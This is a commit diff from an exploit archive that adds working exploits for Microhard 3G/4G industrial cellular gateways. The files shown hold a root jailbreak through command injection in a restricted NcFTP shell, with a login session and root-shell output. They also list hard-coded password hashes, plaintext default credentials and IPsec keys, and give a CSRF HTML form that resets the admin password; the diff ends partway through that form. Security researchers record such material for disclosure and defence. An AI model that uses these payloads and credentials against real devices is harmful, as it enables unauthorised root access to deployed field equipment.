DB: 2018-07-18
10 changes to exploits/shellcodes Linux/Ubuntu - Other Users coredumps can be read via setgid Directory and killpriv Bypass Linux (Ubuntu) - Other Users coredumps Can Be Read via setgid Directory and killpriv Bypass Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Default Credentials QNAP Q'Center - change_passwd Command Execution (Metasploit) Nanopool Claymore Dual Miner - APIs RCE (Metasploit) Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root Linux/x64 - Reverse (::1:1337/TCP) Shell (/bin/sh) + IPv6 + Password (pwnd) Shellcode (115 bytes)
This commit is contained in:
parent
a657b64301
commit
1f88d0a67a
12 changed files with 1821 additions and 1 deletions
291
exploits/hardware/local/45041.txt
Normal file
291
exploits/hardware/local/45041.txt
Normal file
|
@ -0,0 +1,291 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Backdoor Jailbreak
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: The web shell application includes a service called Microhard Sh that is documented
|
||||||
|
only as 'reserved for internal use'. This service can be enabled by an authenticated
|
||||||
|
user within the Services menu in the web admin panel. This can also be enabled via CSRF
|
||||||
|
attack. When the service is enabled, a user 'msshc' is created on the system with password
|
||||||
|
'msshc' for SSH shell access on port 22. When connected, the user is dropped into a NcFTP
|
||||||
|
jailed environment, that has limited commands for file transfer administration. One of the
|
||||||
|
commands is a custom added 'ping' command that has a command injection vulnerability that
|
||||||
|
allows the attacker to escape the restricted environment and enter into a root shell terminal
|
||||||
|
that can execute commands as the root user.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5486
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5486.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
1) Enable Microhard Sh service:
|
||||||
|
-------------------------------
|
||||||
|
|
||||||
|
http://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=start - Start the Microhard Sh (msshc) service
|
||||||
|
http://192.168.1.1/cgi-bin/webif/system-services.sh?service=msshc&action=enable - Auto-enable (auto-start)
|
||||||
|
|
||||||
|
|
||||||
|
2) Check what happens when enabling Microhard Sh service:
|
||||||
|
---------------------------------------------------------
|
||||||
|
|
||||||
|
# cat /etc/init.d/msshc
|
||||||
|
#!/bin/sh /etc/rc.common
|
||||||
|
# Copyright (C) 2013 Microhardcorp
|
||||||
|
|
||||||
|
start() {
|
||||||
|
deluser msshc
|
||||||
|
rm -rf /tmp/msshc
|
||||||
|
mkdir -p /tmp/msshc
|
||||||
|
msshcshell=$(cat /etc/shells | grep -c "/etc/msshc.sh")
|
||||||
|
[ $msshcshell -gt 0 ] || echo "/etc/msshc.sh" >> /etc/shells
|
||||||
|
passwd=$(/sbin/uci get msshc.general.passwd)
|
||||||
|
echo "$passwd" >> /etc/passwd
|
||||||
|
}
|
||||||
|
|
||||||
|
stop() {
|
||||||
|
deluser msshc
|
||||||
|
rm -rf /tmp/msshc
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
3) Check the /etc/msshc.sh script:
|
||||||
|
----------------------------------
|
||||||
|
|
||||||
|
# cat /etc/msshc.sh
|
||||||
|
#!/bin/sh
|
||||||
|
# Copyright (C) 2013 Microhardcorp
|
||||||
|
|
||||||
|
/usr/bin/ncftp
|
||||||
|
|
||||||
|
exit 0
|
||||||
|
|
||||||
|
|
||||||
|
4) Check the /sbin/uci binary:
|
||||||
|
------------------------------
|
||||||
|
|
||||||
|
Usage: /sbin/uci [<options>] <command> [<arguments>]
|
||||||
|
|
||||||
|
Commands:
|
||||||
|
batch
|
||||||
|
export [<config>]
|
||||||
|
import [<config>]
|
||||||
|
changes [<config>]
|
||||||
|
commit [<config>]
|
||||||
|
add <config> <section-type>
|
||||||
|
add_list <config>.<section>.<option>=<string>
|
||||||
|
show [<config>[.<section>[.<option>]]]
|
||||||
|
get <config>.<section>[.<option>]
|
||||||
|
set <config>.<section>[.<option>]=<value>
|
||||||
|
delete <config>[.<section[.<option>]]
|
||||||
|
rename <config>.<section>[.<option>]=<name>
|
||||||
|
revert <config>[.<section>[.<option>]]
|
||||||
|
|
||||||
|
Options:
|
||||||
|
-c <path> set the search path for config files (default: /etc/config)
|
||||||
|
-d <str> set the delimiter for list values in uci show
|
||||||
|
-f <file> use <file> as input instead of stdin
|
||||||
|
-L do not load any plugins
|
||||||
|
-m when importing, merge data into an existing package
|
||||||
|
-n name unnamed sections on export (default)
|
||||||
|
-N don't name unnamed sections
|
||||||
|
-p <path> add a search path for config change files
|
||||||
|
-P <path> add a search path for config change files and use as default
|
||||||
|
-q quiet mode (don't print error messages)
|
||||||
|
-s force strict mode (stop on parser errors, default)
|
||||||
|
-S disable strict mode
|
||||||
|
-X do not use extended syntax on 'show'
|
||||||
|
|
||||||
|
# /sbin/uci get msshc.general.passwd
|
||||||
|
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
|
||||||
|
|
||||||
|
|
||||||
|
5) Check the NcFTP binary:
|
||||||
|
--------------------------
|
||||||
|
|
||||||
|
# /usr/bin/ncftp -h
|
||||||
|
|
||||||
|
Usage: ncftp [flags] [<host> | <directory URL to browse>]
|
||||||
|
|
||||||
|
Flags:
|
||||||
|
-u XX Use username XX instead of anonymous.
|
||||||
|
-p XX Use password XX with the username.
|
||||||
|
-P XX Use port number XX instead of the default FTP service port (21).
|
||||||
|
-j XX Use account XX with the username (rarely needed).
|
||||||
|
-F Dump a sample $HOME/.ncftp/firewall prefs file to stdout and exit.
|
||||||
|
|
||||||
|
Program version: NcFTP 3.2.5/474 Feb 02 2011, 05:13 PM
|
||||||
|
Library version: LibNcFTP 3.2.5 (January 17, 2011)
|
||||||
|
Build system: Linux DProBuilder 2.6.34.9-69.fc13.i686.PAE #1 SMP Tue Ma...
|
||||||
|
|
||||||
|
This is a freeware program by Mike Gleason (http://www.NcFTP.com).
|
||||||
|
A directory URL ends in a slash, i.e. ftp://ftp.freebsd.org/pub/FreeBSD/
|
||||||
|
Use ncftpget and ncftpput for command-line FTP and file URLs.
|
||||||
|
|
||||||
|
|
||||||
|
6) Go to jail:
|
||||||
|
--------------
|
||||||
|
|
||||||
|
lqwrm@metalgear:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 msshc@192.168.1.1
|
||||||
|
The authenticity of host '192.168.1.1 (192.168.1.1)' can't be established.
|
||||||
|
RSA key fingerprint is SHA256:x9GG/Dlkg88058ilA2xyhYqllYRgZOTPu6reGS8K1Yg.
|
||||||
|
Are you sure you want to continue connecting (yes/no)? yes
|
||||||
|
Warning: Permanently added '192.168.1.1' (RSA) to the list of known hosts.
|
||||||
|
msshc@192.168.1.1's password:
|
||||||
|
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
|
||||||
|
|
||||||
|
Copyright (c) 1992-2011 by Mike Gleason.
|
||||||
|
All rights reserved.
|
||||||
|
|
||||||
|
ncftp> ?
|
||||||
|
Commands may be abbreviated. 'help showall' shows hidden and unsupported
|
||||||
|
commands. 'help <command>' gives a brief description of <command>.
|
||||||
|
|
||||||
|
ascii close help mkdir put rename set umask
|
||||||
|
binary debug lls open pwd rhelp show
|
||||||
|
cd dir lrm passive quit rm site
|
||||||
|
chmod get ls ping quote rmdir type
|
||||||
|
|
||||||
|
For details, please see the manual ("man ncftp" at your regular shell prompt
|
||||||
|
or online at http://www.NcFTP.com/ncftp/doc/ncftp.html).
|
||||||
|
ncftp> help showall
|
||||||
|
Commands may be abbreviated. 'help showall' shows hidden and unsupported
|
||||||
|
commands. 'help <command>' gives a brief description of <command>.
|
||||||
|
|
||||||
|
? chmod exit ls mv pwd rhelp site
|
||||||
|
ascii close get mget open quit rm type
|
||||||
|
binary debug help mkdir passive quote rmdir umask
|
||||||
|
bye delete lls mls ping rename set
|
||||||
|
cd dir lrm mput put rglob show
|
||||||
|
|
||||||
|
For details, please see the manual ("man ncftp" at your regular shell prompt
|
||||||
|
or online at http://www.NcFTP.com/ncftp/doc/ncftp.html).
|
||||||
|
ncftp> ls
|
||||||
|
ls: must be connected to do that.
|
||||||
|
ncftp> man ncftp
|
||||||
|
man: no such command.
|
||||||
|
ncftp> pwd
|
||||||
|
pwd: must be connected to do that.
|
||||||
|
ncftp> show
|
||||||
|
anon-password NcFTP@
|
||||||
|
auto-ascii |.txt|.asc|.html|.htm|.css|.xml|.ini|.pl|.hqx|.cfg|.c|.h|.cpp|.hpp|.bat|.m3u|.pls|
|
||||||
|
auto-resume no
|
||||||
|
autosave-bookmark-changes no
|
||||||
|
confirm-close no
|
||||||
|
connect-timeout 20
|
||||||
|
control-timeout 135
|
||||||
|
logsize 10240
|
||||||
|
pager more
|
||||||
|
passive optional
|
||||||
|
progress-meter 2 (statbar)
|
||||||
|
redial-delay 20
|
||||||
|
save-passwords ask
|
||||||
|
show-status-in-xterm-titlebar no
|
||||||
|
so-bufsize 0 (use system default)
|
||||||
|
xfer-timeout 3600
|
||||||
|
yes-i-know-about-NcFTPd no
|
||||||
|
ncftp>
|
||||||
|
|
||||||
|
|
||||||
|
7) The Shawshank Redemption:
|
||||||
|
----------------------------
|
||||||
|
|
||||||
|
ncftp> ping -c1 -4 0.0.0.0 `id`
|
||||||
|
BusyBox v1.15.3 (2016-06-20 14:58:14 MDT) multi-call binary
|
||||||
|
|
||||||
|
Usage: ping [OPTIONS] HOST
|
||||||
|
|
||||||
|
Send ICMP ECHO_REQUEST packets to network hosts
|
||||||
|
|
||||||
|
Options:
|
||||||
|
-4, -6 Force IPv4 or IPv6 hostname resolution
|
||||||
|
-c CNT Send only CNT pings
|
||||||
|
-s SIZE Send SIZE data bytes in packets (default:56)
|
||||||
|
-I IFACE/IP Use interface or IP address as source
|
||||||
|
-W SEC Seconds to wait for the first response (default:10)
|
||||||
|
(after all -c CNT packets are sent)
|
||||||
|
-w SEC Seconds until ping exits (default:infinite)
|
||||||
|
(can exit earlier with -c CNT)
|
||||||
|
-q Quiet, only displays output at start
|
||||||
|
and when finished
|
||||||
|
|
||||||
|
ncftp>
|
||||||
|
|
||||||
|
|
||||||
|
8) Come on Andy:
|
||||||
|
----------------
|
||||||
|
|
||||||
|
ncftp> ping -c1 -4 0.0.0.0 && /bin/sh
|
||||||
|
PING 0.0.0.0 (0.0.0.0): 56 data bytes
|
||||||
|
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.423 ms
|
||||||
|
|
||||||
|
--- 0.0.0.0 ping statistics ---
|
||||||
|
1 packets transmitted, 1 packets received, 0% packet loss
|
||||||
|
round-trip min/avg/max = 0.423/0.423/0.423 ms
|
||||||
|
|
||||||
|
|
||||||
|
BusyBox v1.15.3 (2016-06-20 14:58:14 MDT) built-in shell (ash)
|
||||||
|
Enter 'help' for a list of built-in commands.
|
||||||
|
|
||||||
|
/tmp/msshc # id ; uname -r
|
||||||
|
uid=0(root) gid=0(root)
|
||||||
|
2.6.32.9
|
||||||
|
/tmp/msshc #
|
99
exploits/hardware/remote/45040.txt
Normal file
99
exploits/hardware/remote/45040.txt
Normal file
|
@ -0,0 +1,99 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway Default Credentials
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: The devices utilizes hard-coded credentials within its Linux distribution image.
|
||||||
|
These sets of credentials are never exposed to the end-user and cannot be changed through
|
||||||
|
any normal operation of the gateway. Another vulnerability could allow an authenticated
|
||||||
|
attacker to gain root access. The vulnerability is due to default credentials. An attacker
|
||||||
|
could exploit this vulnerability by logging in using the default credentials.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5480
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5480.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
System/Web/FTP:
|
||||||
|
---------------
|
||||||
|
root:$1$fwjr710d$lOBXhRTmQk/rLLJY5sitO/:0:0:root:/:/bin/ash
|
||||||
|
admin:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:0:0:admin:/:/etc/m_cli/m_cli.sh
|
||||||
|
upgrade:$1$ZsGmi0zo$nHGOo8TJCoTIoUGOKK/Oc1:500:500:ftpupgrade:/upgrade/upgrade:/bin/false
|
||||||
|
at:$1$rKAtMKeY$RSLlzCp8LzEENRaBk615o/:0:0:admin:/:/bin/atUI
|
||||||
|
nobody:*:65534:65534:nobody:/var:/bin/false
|
||||||
|
testlab:$1$.ezacuj4$s.hoiWAaLH7G./vHcfXku.:0:0:Linux User,,,:/:/etc/testlab.sh
|
||||||
|
testlab1:$1$tV44sdhe$cgoB4Pk814NQl.1Uo90It0:0:0:Linux User,,,:/:/etc/m_cli/m_cli.sh
|
||||||
|
msshc:$1$bM7uisGu$iMRC.LVlXjKAv7Y07t1fm/:0:0:root:/tmp/msshc:/etc/msshc.sh
|
||||||
|
|
||||||
|
upgrade:admin
|
||||||
|
testlab:testlab
|
||||||
|
testlab1:testlab1
|
||||||
|
admin:admin
|
||||||
|
msshc:msshc
|
||||||
|
|
||||||
|
BCLC config defaults:
|
||||||
|
---------------------
|
||||||
|
IPSec preshared key: DerekUsedThisSecureKeyToEncryptClientAccessIn2014
|
||||||
|
Access control user/pass: admin:5@lm0nIsG00d
|
||||||
|
NMS System setting pass: NotComplicated
|
||||||
|
Webclient setting user/pass: webclient:AlsoNotComplicated
|
||||||
|
System access control user/pass: readonly:ItIsAlmostFriday
|
238
exploits/hardware/webapps/45034.html
Normal file
238
exploits/hardware/webapps/45034.html
Normal file
|
@ -0,0 +1,238 @@
|
||||||
|
Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway CSRF Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
Vendor: Microhard Systems Inc.
|
||||||
|
Product web page: http://www.microhardcorp.com
|
||||||
|
Affected version: IPn4G 1.1.0 build 1098
|
||||||
|
IPn3Gb 2.2.0 build 2160
|
||||||
|
IPn4Gb 1.1.6 build 1184-14
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1090-2
|
||||||
|
IPn4Gb 1.1.0 Rev 2 build 1086
|
||||||
|
Bullet-3G 1.2.0 Rev A build 1032
|
||||||
|
VIP4Gb 1.1.6 build 1204
|
||||||
|
VIP4G 1.1.6 Rev 3.0 build 1184-14
|
||||||
|
VIP4G-WiFi-N 1.1.6 Rev 2.0.0 build 1196
|
||||||
|
IPn3Gii / Bullet-3G 1.2.0 build 1076
|
||||||
|
IPn4Gii / Bullet-LTE 1.2.0 build 1078
|
||||||
|
BulletPlus 1.3.0 build 1036
|
||||||
|
Dragon-LTE 1.1.0 build 1036
|
||||||
|
|
||||||
|
Summary: The new IPn4Gb provides a rugged, industrial strength wireless solution
|
||||||
|
using the new and ultra fast 4G LTE cellular network infrastructure. The IPn4Gb
|
||||||
|
features integrated Firewall, IPSec / VPN & GRE Tunneling, IP/MAC Access Control
|
||||||
|
Lists. The IPn4Gb can transport critical data to and from SMS, Ethernet and Serial
|
||||||
|
RS232/485/422 devices!
|
||||||
|
|
||||||
|
The IPn3Gb provides a fast, secure industrial strength wireless solution that uses
|
||||||
|
the widespread deployment of cellular network infrastructure for critical data collection.
|
||||||
|
From remote meters and sensors, to providing mobile network access, the IPn3Gb delivers!
|
||||||
|
The IPn3Gb is a powerful HSPA+ and Quad Band GSM device compatible almost anywhere. It
|
||||||
|
provides robust and secure wireless communication of Serial, USB and Ethernet data.
|
||||||
|
|
||||||
|
The all new Bullet-3G provides a compact, robust, feature packed industrial strength
|
||||||
|
wireless solution using fast 3G/HSPA+ network infrastructure. The Bullet-3G takes things
|
||||||
|
to the next level by providing features such as Ethernet with PoE, RS232 Serial port
|
||||||
|
and 2x Programmable I/O. Offering enhanced, 'Secure Communication' with its integrated
|
||||||
|
Firewall, IPSec VPN Tunneling, IP/MAC Access Control Lists, the Bullet-3G is a solution
|
||||||
|
worth looking at!
|
||||||
|
|
||||||
|
The all new Dragon-LTE provides a feature packed, compact OEM, industrial strength
|
||||||
|
wireless IoT & M2M solution. Connect any device, wired or wireless, and provide remote
|
||||||
|
cellular access using the Dragon-LTE. The Dragon-LTE features a OEM design for tight
|
||||||
|
system integration and design flexibility with dual Ethernet Ports and high power
|
||||||
|
802.11b/g/n WIFI. With its integrated Firewall, IPSec VPN Tunneling and IP/MAC Access
|
||||||
|
Control Lists, the Dragon-LTE provides a solution for any cellular application!
|
||||||
|
|
||||||
|
The new VIP4Gb provides a rugged, industrial strength wireless solution using 4G LTE
|
||||||
|
network infrastructure for critical data communications. The VIP4Gb provides simultaneous
|
||||||
|
network connections for 802.11a/b/g/n WiFi devices, 4 x 10/100/1000 Ethernet ports, Digital
|
||||||
|
I/O, and a RS232/RS485 port, resulting in a communication device that can be deployed in
|
||||||
|
any application! The VIP4Gb is a powerful 4G LTE device compatible on any cellular network.
|
||||||
|
It provides robust and secure wireless communication of Serial, Ethernet & WiFi data.
|
||||||
|
|
||||||
|
Desc: The application interface allows users to perform certain actions via HTTP requests
|
||||||
|
without performing any validity checks to verify the requests. This can be exploited to
|
||||||
|
perform certain actions with administrative privileges if a logged-in user visits a malicious
|
||||||
|
web site.
|
||||||
|
|
||||||
|
Tested on: httpd-ssl-1.0.0
|
||||||
|
Linux 2.6.32.9 (Bin@DProBuilder) (gcc version 4.4.3)
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||||
|
@zeroscience
|
||||||
|
|
||||||
|
|
||||||
|
Advisory ID: ZSL-2018-5478
|
||||||
|
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5478.php
|
||||||
|
|
||||||
|
|
||||||
|
13.03.2018
|
||||||
|
|
||||||
|
--
|
||||||
|
|
||||||
|
|
||||||
|
CSRF Change Admin password:
|
||||||
|
---------------------------
|
||||||
|
|
||||||
|
<html>
|
||||||
|
<body>
|
||||||
|
<form action="http://192.168.1.1/cgi-bin/webif/system-acl.sh" method="POST" enctype="multipart/form-data">
|
||||||
|
<input type="hidden" name="submit" value="1" />
|
||||||
|
<input type="hidden" name="pw1" value="nimda" />
|
||||||
|
<input type="hidden" name="pw2" value="nimda" />
|
||||||
|
<input type="hidden" name="passwdchange" value=" Change Passwd " />
|
||||||
|
<input type="hidden" name="user_add" value="" />
|
||||||
|
<input type="hidden" name="password_add" value="" />
|
||||||
|
<input type="hidden" name="password2_add" value="" />
|
||||||
|
<input type="hidden" name="Carrier_enable" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_Status" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_Settings" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_Keepalive" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_TrafficWatchdog" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_DynamicDNS" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_SMSConfig" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_SMS" value="0" />
|
||||||
|
<input type="hidden" name="Carrier_DataUsage" value="0" />
|
||||||
|
<input type="hidden" name="Comport_enable" value="0" />
|
||||||
|
<input type="hidden" name="Comport_Status" value="0" />
|
||||||
|
<input type="hidden" name="Comport_Com0" value="0" />
|
||||||
|
<input type="hidden" name="Comport_Com1" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_enable" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_Status" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_General" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_Rules" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_PortForwarding" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_MACIPList" value="0" />
|
||||||
|
<input type="hidden" name="Firewall_Reset" value="0" />
|
||||||
|
<input type="hidden" name="GPS_enable" value="0" />
|
||||||
|
<input type="hidden" name="GPS_Location" value="0" />
|
||||||
|
<input type="hidden" name="GPS_Settings" value="0" />
|
||||||
|
<input type="hidden" name="GPS_Report" value="0" />
|
||||||
|
<input type="hidden" name="GPS_GpsGate" value="0" />
|
||||||
|
<input type="hidden" name="GPS_Recorder" value="0" />
|
||||||
|
<input type="hidden" name="GPS_LoadRecord" value="0" />
|
||||||
|
<input type="hidden" name="I/O_enable" value="0" />
|
||||||
|
<input type="hidden" name="I/O_Status" value="0" />
|
||||||
|
<input type="hidden" name="I/O_OUTPUT" value="0" />
|
||||||
|
<input type="hidden" name="Network_enable" value="0" />
|
||||||
|
<input type="hidden" name="Network_Status" value="0" />
|
||||||
|
<input type="hidden" name="Network_LAN" value="0" />
|
||||||
|
<input type="hidden" name="Network_Routes" value="0" />
|
||||||
|
<input type="hidden" name="Network_GRE" value="0" />
|
||||||
|
<input type="hidden" name="Network_PIMSM" value="0" />
|
||||||
|
<input type="hidden" name="Network_SNMP" value="0" />
|
||||||
|
<input type="hidden" name="Network_sdpServer" value="0" />
|
||||||
|
<input type="hidden" name="Network_LocalMonitor" value="0" />
|
||||||
|
<input type="hidden" name="Network_Port" value="0" />
|
||||||
|
<input type="hidden" name="System_enable" value="0" />
|
||||||
|
<input type="hidden" name="System_Settings" value="0" />
|
||||||
|
<input type="hidden" name="System_AccessControl" value="0" />
|
||||||
|
<input type="hidden" name="System_Services" value="0" />
|
||||||
|
<input type="hidden" name="System_Maintenance" value="0" />
|
||||||
|
<input type="hidden" name="System_Reboot" value="0" />
|
||||||
|
<input type="hidden" name="Tools_enable" value="0" />
|
||||||
|
<input type="hidden" name="Tools_Discovery" value="0" />
|
||||||
|
<input type="hidden" name="Tools_NetflowReport" value="0" />
|
||||||
|
<input type="hidden" name="Tools_NMSSettings" value="0" />
|
||||||
|
<input type="hidden" name="Tools_EventReport" value="0" />
|
||||||
|
<input type="hidden" name="Tools_Modbus" value="0" />
|
||||||
|
<input type="hidden" name="Tools_Websocket" value="0" />
|
||||||
|
<input type="hidden" name="Tools_SiteSurvey" value="0" />
|
||||||
|
<input type="hidden" name="Tools_Ping" value="0" />
|
||||||
|
<input type="hidden" name="Tools_TraceRoute" value="0" />
|
||||||
